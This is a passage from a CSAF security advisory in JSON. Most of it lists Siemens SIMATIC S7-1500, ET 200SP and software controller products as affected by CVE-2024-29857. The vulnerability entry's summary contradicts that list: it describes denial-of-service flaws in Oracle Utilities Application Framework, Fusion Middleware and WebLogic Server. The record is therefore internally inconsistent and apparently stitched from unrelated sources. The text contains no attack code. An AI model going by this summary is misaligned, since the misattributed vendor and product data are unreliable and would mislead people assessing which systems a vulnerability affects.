"name": "vers:unknown/*",
"product": {
"name": "vers:unknown/*",
"product_id": "CSAFPID-21"
}
}
],
"category": "product_name",
"name": "SIMATIC ET 200SP Open Controller CPU 1515SP PC2 (incl. SIPLUS variants) V2 CPUs - Windows OS"
},
{
"branches": [
{
"category": "product_version_range",
"name": "vers:unknown/*",
"product": {
"name": "vers:unknown/*",
"product_id": "CSAFPID-22"
}
}
],
"category": "product_name",
"name": "SIMATIC ET 200SP Open Controller CPU 1515SP PC2 (incl. SIPLUS variants) V3 CPUs - Industrial OS"
},
{
"branches": [
{
"category": "product_version_range",
"name": "vers:unknown/*",
"product": {
"name": "vers:unknown/*",
"product_id": "CSAFPID-23"
}
}
],
"category": "product_name",
"name": "SIMATIC ET 200SP Open Controller CPU 1515SP PC2 (incl. SIPLUS variants) V3 CPUs - Windows OS"
},
{
"branches": [
{
"category": "product_version_range",
"name": "vers:unknown/*",
"product": {
"name": "vers:unknown/*",
"product_id": "CSAFPID-24"
}
}
],
"category": "product_name",
"name": "SIMATIC ET 200SP Open Controller CPU 1515SP PC3 (incl. SIPLUS variants) V2 CPUs - Windows OS"
},
{
"branches": [
{
"category": "product_version_range",
"name": "vers:unknown/*",
"product": {
"name": "vers:unknown/*",
"product_id": "CSAFPID-25"
}
}
],
"category": "product_name",
"name": "SIMATIC ET 200SP Open Controller CPU 1515SP PC3 (incl. SIPLUS variants) V3 CPUs - Industrial OS"
},
{
"branches": [
{
"category": "product_version_range",
"name": "vers:unknown/*",
"product": {
"name": "vers:unknown/*",
"product_id": "CSAFPID-26"
}
}
],
"category": "product_name",
"name": "SIMATIC ET 200SP Open Controller CPU 1515SP PC3 (incl. SIPLUS variants) V3 CPUs - Windows OS"
},
{
"branches": [
{
"category": "product_version_range",
"name": "vers:unknown/*",
"product": {
"name": "vers:unknown/*",
"product_id": "CSAFPID-27"
}
}
],
"category": "product_name",
"name": "SIMATIC S7-1500 CPU 1511-1 PN (6ES7511-1AK00-0AB0)"
},
{
"branches": [
{
"category": "product_version_range",
"name": "vers:unknown/*",
"product": {
"name": "vers:unknown/*",
"product_id": "CSAFPID-28"
}
}
],
"category": "product_name",
"name": "SIMATIC S7-1500 CPU 1511-1 PN (6ES7511-1AK01-0AB0)"
},
{
"branches": [
{
"category": "product_version_range",
"name": "vers:unknown/*",
"product": {
"name": "vers:unknown/*",
"product_id": "CSAFPID-29"
}
}
],
"category": "product_name",
"name": "SIMATIC S7-1500 CPU 1511-1 PN (6ES7511-1AK02-0AB0)"
},
{
"branches": [
{
"category": "product_version_range",
"name": "vers:unknown/*",
"product": {
"name": "vers:unknown/*",
"product_id": "CSAFPID-30"
}
}
],
"category": "product_name",
"name": "SIMATIC S7-1500 CPU 1511-1 PN (6ES7511-1AL03-0AB0)"
},
{
"branches": [
{
"category": "product_version_range",
"name": "vers:unknown/*",
"product": {
"name": "vers:unknown/*",
"product_id": "CSAFPID-31"
}
}
],
"category": "product_name",
"name": "SIMATIC S7-1500 CPU 1511C-1 PN (6ES7511-1CK00-0AB0)"
},
{
"branches": [
{
"category": "product_version_range",
"name": "vers:unknown/*",
"product": {
"name": "vers:unknown/*",
"product_id": "CSAFPID-32"
}
}
],
"category": "product_name",
"name": "SIMATIC S7-1500 CPU 1511C-1 PN (6ES7511-1CK01-0AB0)"
},
{
"branches": [
{
"category": "product_version_range",
"name": "vers:unknown/*",
"product": {
"name": "vers:unknown/*",
"product_id": "CSAFPID-33"
}
}
],
"category": "product_name",
"name": "SIMATIC S7-1500 CPU 1511C-1 PN (6ES7511-1CL03-0AB0)"
},
{
"branches": [
{
"category": "product_version_range",
"name": "vers:unknown/*",
"product": {
"name": "vers:unknown/*",
"product_id": "CSAFPID-34"
}
}
],
"category": "product_name",
"name": "SIMATIC S7-1500 CPU 1511F-1 PN (6ES7511-1FK01-0AB0)"
},
{
"branches": [
{
"category": "product_version_range",
"name": "vers:unknown/*",
"product": {
"name": "vers:unknown/*",
"product_id": "CSAFPID-35"
}
}
],
"category": "product_name",
"name": "SIMATIC S7-1500 CPU 1511F-1 PN (6ES7511-1FK02-0AB0)"
},
{
"branches": [
{
"category": "product_version_range",
"name": "vers:unknown/*",
"product": {
"name": "vers:unknown/*",
"product_id": "CSAFPID-36"
}
}
],
"category": "product_name",
"name": "SIMATIC S7-1500 CPU 1511F-1 PN (6ES7511-1FL03-0AB0)"
},
{
"branches": [
{
"category": "product_version_range",
"name": "vers:unknown/*",
"product": {
"name": "vers:unknown/*",
"product_id": "CSAFPID-37"
}
}
],
"category": "product_name",
"name": "SIMATIC S7-1500 CPU 1511T-1 PN (6ES7511-1TK01-0AB0)"
},
{
"branches": [
{
"category": "product_version_range",
"name": "vers:unknown/*",
"product": {
"name": "vers:unknown/*",
"product_id": "CSAFPID-38"
}
}
],
"category": "product_name",
"name": "SIMATIC S7-1500 CPU 1511T-1 PN (6ES7511-1TL03-0AB0)"
},
{
"branches": [
{
"category": "product_version_range",
"name": "vers:unknown/*",
"product": {
"name": "vers:unknown/*",
"product_id": "CSAFPID-39"
}
}
],
"category": "product_name",
"name": "SIMATIC S7-1500 CPU 1511TF-1 PN (6ES7511-1UK01-0AB0)"
},
{
"branches": [
{
"category": "product_version_range",
"name": "vers:unknown/*",
"product": {
"name": "vers:unknown/*",
"product_id": "CSAFPID-40"
}
}
],
"category": "product_name",
"name": "SIMATIC S7-1500 CPU 1511TF-1 PN (6ES7511-1UL03-0AB0)"
},
{
"branches": [
{
"category": "product_version_range",
"name": "vers:unknown/*",
"product": {
"name": "vers:unknown/*",
"product_id": "CSAFPID-41"
}
}
],
"category": "product_name",
"name": "SIMATIC S7-1500 CPU 1512C-1 PN (6ES7512-1CK00-0AB0)"
},
{
"branches": [
{
"category": "product_version_range",
"name": "vers:unknown/*",
"product": {
"name": "vers:unknown/*",
"product_id": "CSAFPID-42"
}
}
],
"category": "product_name",
"name": "SIMATIC S7-1500 CPU 1512C-1 PN (6ES7512-1CK01-0AB0)"
},
{
"branches": [
{
"category": "product_version_range",
"name": "vers:unknown/*",
"product": {
"name": "vers:unknown/*",
"product_id": "CSAFPID-43"
}
}
],
"category": "product_name",
"name": "SIMATIC S7-1500 CPU 1512C-1 PN (6ES7512-1CM03-0AB0)"
},
{
"branches": [
{
"category": "product_version_range",
"name": "vers:unknown/*",
"product": {
"name": "vers:unknown/*",
"product_id": "CSAFPID-44"
}
}
],
"category": "product_name",
"name": "SIMATIC S7-1500 CPU 1513-1 PN (6ES7513-1AL01-0AB0)"
},
{
"branches": [
{
"category": "product_version_range",
"name": "vers:unknown/*",
"product": {
"name": "vers:unknown/*",
"product_id": "CSAFPID-45"
}
}
],
"category": "product_name",
"name": "SIMATIC S7-1500 CPU 1513-1 PN (6ES7513-1AL02-0AB0)"
},
{
"branches": [
{
"category": "product_version_range",
"name": "vers:unknown/*",
"product": {
"name": "vers:unknown/*",
"product_id": "CSAFPID-46"
}
}
],
"category": "product_name",
"name": "SIMATIC S7-1500 CPU 1513-1 PN (6ES7513-1AM03-0AB0)"
},
{
"branches": [
{
"category": "product_version_range",
"name": "vers:unknown/*",
"product": {
"name": "vers:unknown/*",
"product_id": "CSAFPID-47"
}
}
],
"category": "product_name",
"name": "SIMATIC S7-1500 CPU 1513F-1 PN (6ES7513-1FL01-0AB0)"
},
{
"branches": [
{
"category": "product_version_range",
"name": "vers:unknown/*",
"product": {
"name": "vers:unknown/*",
"product_id": "CSAFPID-48"
}
}
],
"category": "product_name",
"name": "SIMATIC S7-1500 CPU 1513F-1 PN (6ES7513-1FL02-0AB0)"
},
{
"branches": [
{
"category": "product_version_range",
"name": "vers:unknown/*",
"product": {
"name": "vers:unknown/*",
"product_id": "CSAFPID-49"
}
}
],
"category": "product_name",
"name": "SIMATIC S7-1500 CPU 1513F-1 PN (6ES7513-1FM03-0AB0)"
},
{
"branches": [
{
"category": "product_version_range",
"name": "vers:unknown/*",
"product": {
"name": "vers:unknown/*",
"product_id": "CSAFPID-50"
}
}
],
"category": "product_name",
"name": "SIMATIC S7-1500 CPU 1513R-1 PN (6ES7513-1RL00-0AB0)"
},
{
"branches": [
{
"category": "product_version_range",
"name": "vers:unknown/*",
"product": {
"name": "vers:unknown/*",
"product_id": "CSAFPID-51"
}
}
],
"category": "product_name",
"name": "SIMATIC S7-1500 CPU 1513R-1 PN (6ES7513-1RM03-0AB0)"
},
{
"branches": [
{
"category": "product_version_range",
"name": "vers:unknown/*",
"product": {
"name": "vers:unknown/*",
"product_id": "CSAFPID-52"
}
}
],
"category": "product_name",
"name": "SIMATIC S7-1500 CPU 1513pro F-2 PN (6ES7513-2GM03-0AB0)"
},
{
"branches": [
{
"category": "product_version_range",
"name": "vers:unknown/*",
"product": {
"name": "vers:unknown/*",
"product_id": "CSAFPID-53"
}
}
],
"category": "product_name",
"name": "SIMATIC S7-1500 CPU 1513pro-2 PN (6ES7513-2PM03-0AB0)"
},
{
"branches": [
{
"category": "product_version_range",
"name": "vers:unknown/*",
"product": {
"name": "vers:unknown/*",
"product_id": "CSAFPID-54"
}
}
],
"category": "product_name",
"name": "SIMATIC S7-1500 CPU 1515-2 PN (6ES7515-2AM01-0AB0)"
},
{
"branches": [
{
"category": "product_version_range",
"name": "vers:unknown/*",
"product": {
"name": "vers:unknown/*",
"product_id": "CSAFPID-55"
}
}
],
"category": "product_name",
"name": "SIMATIC S7-1500 CPU 1515-2 PN (6ES7515-2AM02-0AB0)"
},
{
"branches": [
{
"category": "product_version_range",
"name": "vers:unknown/*",
"product": {
"name": "vers:unknown/*",
"product_id": "CSAFPID-56"
}
}
],
"category": "product_name",
"name": "SIMATIC S7-1500 CPU 1515-2 PN (6ES7515-2AN03-0AB0)"
},
{
"branches": [
{
"category": "product_version_range",
"name": "vers:unknown/*",
"product": {
"name": "vers:unknown/*",
"product_id": "CSAFPID-57"
}
}
],
"category": "product_name",
"name": "SIMATIC S7-1500 CPU 1515F-2 PN (6ES7515-2FM01-0AB0)"
},
{
"branches": [
{
"category": "product_version_range",
"name": "vers:unknown/*",
"product": {
"name": "vers:unknown/*",
"product_id": "CSAFPID-58"
}
}
],
"category": "product_name",
"name": "SIMATIC S7-1500 CPU 1515F-2 PN (6ES7515-2FM02-0AB0)"
},
{
"branches": [
{
"category": "product_version_range",
"name": "vers:unknown/*",
"product": {
"name": "vers:unknown/*",
"product_id": "CSAFPID-59"
}
}
],
"category": "product_name",
"name": "SIMATIC S7-1500 CPU 1515F-2 PN (6ES7515-2FN03-0AB0)"
},
{
"branches": [
{
"category": "product_version_range",
"name": "vers:unknown/*",
"product": {
"name": "vers:unknown/*",
"product_id": "CSAFPID-60"
}
}
],
"category": "product_name",
"name": "SIMATIC S7-1500 CPU 1515R-2 PN (6ES7515-2RM00-0AB0)"
},
{
"branches": [
{
"category": "product_version_range",
"name": "vers:unknown/*",
"product": {
"name": "vers:unknown/*",
"product_id": "CSAFPID-61"
}
}
],
"category": "product_name",
"name": "SIMATIC S7-1500 CPU 1515R-2 PN (6ES7515-2RN03-0AB0)"
},
{
"branches": [
{
"category": "product_version_range",
"name": "vers:unknown/*",
"product": {
"name": "vers:unknown/*",
"product_id": "CSAFPID-62"
}
}
],
"category": "product_name",
"name": "SIMATIC S7-1500 CPU 1515T-2 PN (6ES7515-2TM01-0AB0)"
},
{
"branches": [
{
"category": "product_version_range",
"name": "vers:unknown/*",
"product": {
"name": "vers:unknown/*",
"product_id": "CSAFPID-63"
}
}
],
"category": "product_name",
"name": "SIMATIC S7-1500 CPU 1515T-2 PN (6ES7515-2TN03-0AB0)"
},
{
"branches": [
{
"category": "product_version_range",
"name": "vers:unknown/*",
"product": {
"name": "vers:unknown/*",
"product_id": "CSAFPID-64"
}
}
],
"category": "product_name",
"name": "SIMATIC S7-1500 CPU 1515TF-2 PN (6ES7515-2UM01-0AB0)"
},
{
"branches": [
{
"category": "product_version_range",
"name": "vers:unknown/*",
"product": {
"name": "vers:unknown/*",
"product_id": "CSAFPID-65"
}
}
],
"category": "product_name",
"name": "SIMATIC S7-1500 CPU 1515TF-2 PN (6ES7515-2UN03-0AB0)"
},
{
"branches": [
{
"category": "product_version_range",
"name": "vers:unknown/*",
"product": {
"name": "vers:unknown/*",
"product_id": "CSAFPID-66"
}
}
],
"category": "product_name",
"name": "SIMATIC S7-1500 CPU 1516-3 PN/DP (6ES7516-3AN01-0AB0)"
},
{
"branches": [
{
"category": "product_version_range",
"name": "vers:unknown/*",
"product": {
"name": "vers:unknown/*",
"product_id": "CSAFPID-67"
}
}
],
"category": "product_name",
"name": "SIMATIC S7-1500 CPU 1516-3 PN/DP (6ES7516-3AN02-0AB0)"
},
{
"branches": [
{
"category": "product_version_range",
"name": "vers:unknown/*",
"product": {
"name": "vers:unknown/*",
"product_id": "CSAFPID-68"
}
}
],
"category": "product_name",
"name": "SIMATIC S7-1500 CPU 1516-3 PN/DP (6ES7516-3AP03-0AB0)"
},
{
"branches": [
{
"category": "product_version_range",
"name": "vers:unknown/*",
"product": {
"name": "vers:unknown/*",
"product_id": "CSAFPID-69"
}
}
],
"category": "product_name",
"name": "SIMATIC S7-1500 CPU 1516F-3 PN/DP (6ES7516-3FN01-0AB0)"
},
{
"branches": [
{
"category": "product_version_range",
"name": "vers:unknown/*",
"product": {
"name": "vers:unknown/*",
"product_id": "CSAFPID-70"
}
}
],
"category": "product_name",
"name": "SIMATIC S7-1500 CPU 1516F-3 PN/DP (6ES7516-3FN02-0AB0)"
},
{
"branches": [
{
"category": "product_version_range",
"name": "vers:unknown/*",
"product": {
"name": "vers:unknown/*",
"product_id": "CSAFPID-71"
}
}
],
"category": "product_name",
"name": "SIMATIC S7-1500 CPU 1516F-3 PN/DP (6ES7516-3FP03-0AB0)"
},
{
"branches": [
{
"category": "product_version_range",
"name": "vers:unknown/*",
"product": {
"name": "vers:unknown/*",
"product_id": "CSAFPID-72"
}
}
],
"category": "product_name",
"name": "SIMATIC S7-1500 CPU 1516T-3 PN (6ES7516-3TP10-0AB0)"
},
{
"branches": [
{
"category": "product_version_range",
"name": "vers:unknown/*",
"product": {
"name": "vers:unknown/*",
"product_id": "CSAFPID-73"
}
}
],
"category": "product_name",
"name": "SIMATIC S7-1500 CPU 1516T-3 PN/DP (6ES7516-3TN00-0AB0)"
},
{
"branches": [
{
"category": "product_version_range",
"name": "vers:unknown/*",
"product": {
"name": "vers:unknown/*",
"product_id": "CSAFPID-74"
}
}
],
"category": "product_name",
"name": "SIMATIC S7-1500 CPU 1516TF-3 PN (6ES7516-3UP10-0AB0)"
},
{
"branches": [
{
"category": "product_version_range",
"name": "vers:unknown/*",
"product": {
"name": "vers:unknown/*",
"product_id": "CSAFPID-75"
}
}
],
"category": "product_name",
"name": "SIMATIC S7-1500 CPU 1516TF-3 PN/DP (6ES7516-3UN00-0AB0)"
},
{
"branches": [
{
"category": "product_version_range",
"name": "vers:unknown/*",
"product": {
"name": "vers:unknown/*",
"product_id": "CSAFPID-76"
}
}
],
"category": "product_name",
"name": "SIMATIC S7-1500 CPU 1516pro F-2 PN (6ES7516-2GP03-0AB0)"
},
{
"branches": [
{
"category": "product_version_range",
"name": "vers:unknown/*",
"product": {
"name": "vers:unknown/*",
"product_id": "CSAFPID-77"
}
}
],
"category": "product_name",
"name": "SIMATIC S7-1500 CPU 1516pro-2 PN (6ES7516-2PP03-0AB0)"
},
{
"branches": [
{
"category": "product_version_range",
"name": "vers:unknown/*",
"product": {
"name": "vers:unknown/*",
"product_id": "CSAFPID-78"
}
}
],
"category": "product_name",
"name": "SIMATIC S7-1500 CPU 1517-3 PN (6ES7517-3AQ10-0AB0)"
},
{
"branches": [
{
"category": "product_version_range",
"name": "vers:unknown/*",
"product": {
"name": "vers:unknown/*",
"product_id": "CSAFPID-79"
}
}
],
"category": "product_name",
"name": "SIMATIC S7-1500 CPU 1517-3 PN/DP (6ES7517-3AP00-0AB0)"
},
{
"branches": [
{
"category": "product_version_range",
"name": "vers:unknown/*",
"product": {
"name": "vers:unknown/*",
"product_id": "CSAFPID-80"
}
}
],
"category": "product_name",
"name": "SIMATIC S7-1500 CPU 1517F-3 PN (6ES7517-3FQ10-0AB0)"
},
{
"branches": [
{
"category": "product_version_range",
"name": "vers:unknown/*",
"product": {
"name": "vers:unknown/*",
"product_id": "CSAFPID-81"
}
}
],
"category": "product_name",
"name": "SIMATIC S7-1500 CPU 1517F-3 PN/DP (6ES7517-3FP00-0AB0)"
},
{
"branches": [
{
"category": "product_version_range",
"name": "vers:unknown/*",
"product": {
"name": "vers:unknown/*",
"product_id": "CSAFPID-82"
}
}
],
"category": "product_name",
"name": "SIMATIC S7-1500 CPU 1517F-3 PN/DP (6ES7517-3FP01-0AB0)"
},
{
"branches": [
{
"category": "product_version_range",
"name": "vers:unknown/*",
"product": {
"name": "vers:unknown/*",
"product_id": "CSAFPID-83"
}
}
],
"category": "product_name",
"name": "SIMATIC S7-1500 CPU 1517H-3 PN (6ES7517-3HP00-0AB0)"
},
{
"branches": [
{
"category": "product_version_range",
"name": "vers:unknown/*",
"product": {
"name": "vers:unknown/*",
"product_id": "CSAFPID-84"
}
}
],
"category": "product_name",
"name": "SIMATIC S7-1500 CPU 1517H-4 PN (6ES7517-4HQ10-0AB0)"
},
{
"branches": [
{
"category": "product_version_range",
"name": "vers:unknown/*",
"product": {
"name": "vers:unknown/*",
"product_id": "CSAFPID-85"
}
}
],
"category": "product_name",
"name": "SIMATIC S7-1500 CPU 1517T-3 PN (6ES7517-3TQ10-0AB0)"
},
{
"branches": [
{
"category": "product_version_range",
"name": "vers:unknown/*",
"product": {
"name": "vers:unknown/*",
"product_id": "CSAFPID-86"
}
}
],
"category": "product_name",
"name": "SIMATIC S7-1500 CPU 1517T-3 PN/DP (6ES7517-3TP00-0AB0)"
},
{
"branches": [
{
"category": "product_version_range",
"name": "vers:unknown/*",
"product": {
"name": "vers:unknown/*",
"product_id": "CSAFPID-87"
}
}
],
"category": "product_name",
"name": "SIMATIC S7-1500 CPU 1517TF-3 PN (6ES7517-3UQ10-0AB0)"
},
{
"branches": [
{
"category": "product_version_range",
"name": "vers:unknown/*",
"product": {
"name": "vers:unknown/*",
"product_id": "CSAFPID-88"
}
}
],
"category": "product_name",
"name": "SIMATIC S7-1500 CPU 1517TF-3 PN/DP (6ES7517-3UP00-0AB0)"
},
{
"branches": [
{
"category": "product_version_range",
"name": "vers:unknown/*",
"product": {
"name": "vers:unknown/*",
"product_id": "CSAFPID-89"
}
}
],
"category": "product_name",
"name": "SIMATIC S7-1500 CPU 1518-3 PN (6ES7518-3AT10-0AB0)"
},
{
"branches": [
{
"category": "product_version_range",
"name": "vers:unknown/*",
"product": {
"name": "vers:unknown/*",
"product_id": "CSAFPID-90"
}
}
],
"category": "product_name",
"name": "SIMATIC S7-1500 CPU 1518-4 PN/DP (6ES7518-4AP00-0AB0)"
},
{
"branches": [
{
"category": "product_version_range",
"name": "vers:unknown/*",
"product": {
"name": "vers:unknown/*",
"product_id": "CSAFPID-91"
}
}
],
"category": "product_name",
"name": "SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AB0)"
},
{
"branches": [
{
"category": "product_version_range",
"name": "vers:unknown/*",
"product": {
"name": "vers:unknown/*",
"product_id": "CSAFPID-92"
}
}
],
"category": "product_name",
"name": "SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AC0)"
},
{
"branches": [
{
"category": "product_version_range",
"name": "vers:unknown/*",
"product": {
"name": "vers:unknown/*",
"product_id": "CSAFPID-93"
}
}
],
"category": "product_name",
"name": "SIMATIC S7-1500 CPU 1518F-3 PN (6ES7518-3FT10-0AB0)"
},
{
"branches": [
{
"category": "product_version_range",
"name": "vers:unknown/*",
"product": {
"name": "vers:unknown/*",
"product_id": "CSAFPID-94"
}
}
],
"category": "product_name",
"name": "SIMATIC S7-1500 CPU 1518F-4 PN/DP (6ES7518-4FP00-0AB0)"
},
{
"branches": [
{
"category": "product_version_range",
"name": "vers:unknown/*",
"product": {
"name": "vers:unknown/*",
"product_id": "CSAFPID-95"
}
}
],
"category": "product_name",
"name": "SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AB0)"
},
{
"branches": [
{
"category": "product_version_range",
"name": "vers:unknown/*",
"product": {
"name": "vers:unknown/*",
"product_id": "CSAFPID-96"
}
}
],
"category": "product_name",
"name": "SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AC0)"
},
{
"branches": [
{
"category": "product_version_range",
"name": "vers:unknown/*",
"product": {
"name": "vers:unknown/*",
"product_id": "CSAFPID-97"
}
}
],
"category": "product_name",
"name": "SIMATIC S7-1500 CPU 1518HF-4 PN (6ES7518-4JP00-0AB0)"
},
{
"branches": [
{
"category": "product_version_range",
"name": "vers:unknown/*",
"product": {
"name": "vers:unknown/*",
"product_id": "CSAFPID-98"
}
}
],
"category": "product_name",
"name": "SIMATIC S7-1500 CPU 1518HF-4 PN (6ES7518-4JT10-0AB0)"
},
{
"branches": [
{
"category": "product_version_range",
"name": "vers:unknown/*",
"product": {
"name": "vers:unknown/*",
"product_id": "CSAFPID-99"
}
}
],
"category": "product_name",
"name": "SIMATIC S7-1500 CPU 1518T-3 PN (6ES7518-3TT10-0AB0)"
},
{
"branches": [
{
"category": "product_version_range",
"name": "vers:unknown/*",
"product": {
"name": "vers:unknown/*",
"product_id": "CSAFPID-100"
}
}
],
"category": "product_name",
"name": "SIMATIC S7-1500 CPU 1518T-4 PN/DP (6ES7518-4TP00-0AB0)"
},
{
"branches": [
{
"category": "product_version_range",
"name": "vers:unknown/*",
"product": {
"name": "vers:unknown/*",
"product_id": "CSAFPID-101"
}
}
],
"category": "product_name",
"name": "SIMATIC S7-1500 CPU 1518TF-3 PN (6ES7518-3UT10-0AB0)"
},
{
"branches": [
{
"category": "product_version_range",
"name": "vers:unknown/*",
"product": {
"name": "vers:unknown/*",
"product_id": "CSAFPID-102"
}
}
],
"category": "product_name",
"name": "SIMATIC S7-1500 CPU 1518TF-4 PN/DP (6ES7518-4UP00-0AB0)"
},
{
"branches": [
{
"category": "product_version_range",
"name": "vers:unknown/*",
"product": {
"name": "vers:unknown/*",
"product_id": "CSAFPID-103"
}
}
],
"category": "product_name",
"name": "SIMATIC S7-1500 CPU S7-1518-4 PN/DP ODK (6ES7518-4AP00-3AB0)"
},
{
"branches": [
{
"category": "product_version_range",
"name": "vers:unknown/*",
"product": {
"name": "vers:unknown/*",
"product_id": "CSAFPID-104"
}
}
],
"category": "product_name",
"name": "SIMATIC S7-1500 CPU S7-1518F-4 PN/DP ODK (6ES7518-4FP00-3AB0)"
},
{
"branches": [
{
"category": "product_version_range",
"name": "vers:unknown/*",
"product": {
"name": "vers:unknown/*",
"product_id": "CSAFPID-105"
}
}
],
"category": "product_name",
"name": "SIMATIC S7-1500 ET 200pro: CPU 1513PRO F-2 PN (6ES7513-2GL00-0AB0)"
},
{
"branches": [
{
"category": "product_version_range",
"name": "vers:unknown/*",
"product": {
"name": "vers:unknown/*",
"product_id": "CSAFPID-106"
}
}
],
"category": "product_name",
"name": "SIMATIC S7-1500 ET 200pro: CPU 1513PRO-2 PN (6ES7513-2PL00-0AB0)"
},
{
"branches": [
{
"category": "product_version_range",
"name": "vers:unknown/*",
"product": {
"name": "vers:unknown/*",
"product_id": "CSAFPID-107"
}
}
],
"category": "product_name",
"name": "SIMATIC S7-1500 ET 200pro: CPU 1516PRO F-2 PN (6ES7516-2GN00-0AB0)"
},
{
"branches": [
{
"category": "product_version_range",
"name": "vers:unknown/*",
"product": {
"name": "vers:unknown/*",
"product_id": "CSAFPID-108"
}
}
],
"category": "product_name",
"name": "SIMATIC S7-1500 ET 200pro: CPU 1516PRO-2 PN (6ES7516-2PN00-0AB0)"
},
{
"branches": [
{
"category": "product_version_range",
"name": "vers:unknown/*",
"product": {
"name": "vers:unknown/*",
"product_id": "CSAFPID-109"
}
}
],
"category": "product_name",
"name": "SIMATIC S7-1500 Software Controller CPU 1507S F V2"
},
{
"branches": [
{
"category": "product_version_range",
"name": "vers:unknown/*",
"product": {
"name": "vers:unknown/*",
"product_id": "CSAFPID-110"
}
}
],
"category": "product_name",
"name": "SIMATIC S7-1500 Software Controller CPU 1507S F V3"
},
{
"branches": [
{
"category": "product_version_range",
"name": "vers:unknown/*",
"product": {
"name": "vers:unknown/*",
"product_id": "CSAFPID-111"
}
}
],
"category": "product_name",
"name": "SIMATIC S7-1500 Software Controller CPU 1507S F V4"
},
{
"branches": [
{
"category": "product_version_range",
"name": "vers:unknown/*",
"product": {
"name": "vers:unknown/*",
"product_id": "CSAFPID-112"
}
}
],
"category": "product_name",
"name": "SIMATIC S7-1500 Software Controller CPU 1507S V2"
},
{
"branches": [
{
"category": "product_version_range",
"name": "vers:unknown/*",
"product": {
"name": "vers:unknown/*",
"product_id": "CSAFPID-113"
}
}
],
"category": "product_name",
"name": "SIMATIC S7-1500 Software Controller CPU 1507S V3"
},
{
"branches": [
{
"category": "product_version_range",
"name": "vers:unknown/*",
"product": {
"name": "vers:unknown/*",
"product_id": "CSAFPID-114"
}
}
],
"category": "product_name",
"name": "SIMATIC S7-1500 Software Controller CPU 1507S V4"
},
{
"branches": [
{
"category": "product_version_range",
"name": "vers:unknown/*",
"product": {
"name": "vers:unknown/*",
"product_id": "CSAFPID-115"
}
}
],
"category": "product_name",
"name": "SIMATIC S7-1500 Software Controller CPU 1508S F V2"
},
{
"branches": [
{
"category": "product_version_range",
"name": "vers:unknown/*",
"product": {
"name": "vers:unknown/*",
"product_id": "CSAFPID-116"
}
}
],
"category": "product_name",
"name": "SIMATIC S7-1500 Software Controller CPU 1508S F V3"
},
{
"branches": [
{
"category": "product_version_range",
"name": "vers:unknown/*",
"product": {
"name": "vers:unknown/*",
"product_id": "CSAFPID-117"
}
}
],
"category": "product_name",
"name": "SIMATIC S7-1500 Software Controller CPU 1508S F V4"
},
{
"branches": [
{
"category": "product_version_range",
"name": "vers:unknown/*",
"product": {
"name": "vers:unknown/*",
"product_id": "CSAFPID-118"
}
}
],
"category": "product_name",
"name": "SIMATIC S7-1500 Software Controller CPU 1508S T V3"
},
{
"branches": [
{
"category": "product_version_range",
"name": "vers:unknown/*",
"product": {
"name": "vers:unknown/*",
"product_id": "CSAFPID-119"
}
}
],
"category": "product_name",
"name": "SIMATIC S7-1500 Software Controller CPU 1508S TF V3"
},
{
"branches": [
{
"category": "product_version_range",
"name": "vers:unknown/*",
"product": {
"name": "vers:unknown/*",
"product_id": "CSAFPID-120"
}
}
],
"category": "product_name",
"name": "SIMATIC S7-1500 Software Controller CPU 1508S V2"
},
{
"branches": [
{
"category": "product_version_range",
"name": "vers:unknown/*",
"product": {
"name": "vers:unknown/*",
"product_id": "CSAFPID-121"
}
}
],
"category": "product_name",
"name": "SIMATIC S7-1500 Software Controller CPU 1508S V3"
},
{
"branches": [
{
"category": "product_version_range",
"name": "vers:unknown/*",
"product": {
"name": "vers:unknown/*",
"product_id": "CSAFPID-122"
}
}
],
"category": "product_name",
"name": "SIMATIC S7-1500 Software Controller CPU 1508S V4"
},
{
"branches": [
{
"category": "product_version_range",
"name": "vers:unknown/*",
"product": {
"name": "vers:unknown/*",
"product_id": "CSAFPID-123"
}
}
],
"category": "product_name",
"name": "SIMATIC S7-1500 Software Controller Linux V2"
},
{
"branches": [
{
"category": "product_version_range",
"name": "vers:unknown/*",
"product": {
"name": "vers:unknown/*",
"product_id": "CSAFPID-124"
}
}
],
"category": "product_name",
"name": "SIMATIC S7-1500 Software Controller Linux V3"
},
{
"branches": [
{
"category": "product_version_range",
"name": "vers:unknown/*",
"product": {
"name": "vers:unknown/*",
"product_id": "CSAFPID-125"
}
}
],
"category": "product_name",
"name": "SIMATIC S7-1500 TM MFP - GNU/Linux subsystem"
},
{
"branches": [
{
"category": "product_version_range",
"name": "vers:unknown/*",
"product": {
"name": "vers:unknown/*",
"product_id": "CSAFPID-126"
}
}
],
"category": "product_name",
"name": "SIMATIC S7-PLCSIM Advanced"
}
],
"category": "vendor",
"name": "Siemens"
}
]
},
"vulnerabilities": [
{
"cve": "CVE-2024-29857",
"cwe": {
"id": "CWE-20",
"name": "Improper Input Validation"
},
"notes": [
{
"category": "other",
"text": "Improper Input Validation",
"title": "CWE-20"
},
{
"category": "other",
"text": "Uncontrolled Resource Consumption",
"title": "CWE-400"
},
{
"category": "other",
"text": "Out-of-bounds Read",
"title": "CWE-125"
},
{
"category": "description",
"text": "Multiple vulnerabilities across Oracle products, including Utilities Application Framework, Fusion Middleware, and WebLogic Server, allow unauthenticated attackers to execute denial of service attacks, with CVSS scores of 7.5 and varying damage ratings.",
"title": "Summary"
}
],
"product_status": {
"known_affected": [
"CSAFPID-1",
"CSAFPID-2",
"CSAFPID-3",
"CSAFPID-4",
"CSAFPID-5",
"CSAFPID-6",
"CSAFPID-7",
"CSAFPID-8",
"CSAFPID-9",
"CSAFPID-10",
"CSAFPID-11",
"CSAFPID-12",
"CSAFPID-13",
"CSAFPID-14",
"CSAFPID-15",
"CSAFPID-16",
"CSAFPID-17",
"CSAFPID-18",
"CSAFPID-19",
"CSAFPID-20",
"CSAFPID-21",
"CSAFPID-22",
"CSAFPID-23",
"CSAFPID-24",
"CSAFPID-25",
"CSAFPID-26",
"CSAFPID-27",
"CSAFPID-28",
"CSAFPID-29",
"CSAFPID-30",
"CSAFPID-31",
"CSAFPID-32",
"CSAFPID-33",
"CSAFPID-34",
"CSAFPID-35",
"CSAFPID-36",
"CSAFPID-37",
"CSAFPID-38",
"CSAFPID-39",
"CSAFPID-40",
"CSAFPID-41",
"CSAFPID-42",
"CSAFPID-43",
"CSAFPID-44",
"CSAFPID-45",
"CSAFPID-46",
"CSAFPID-47",
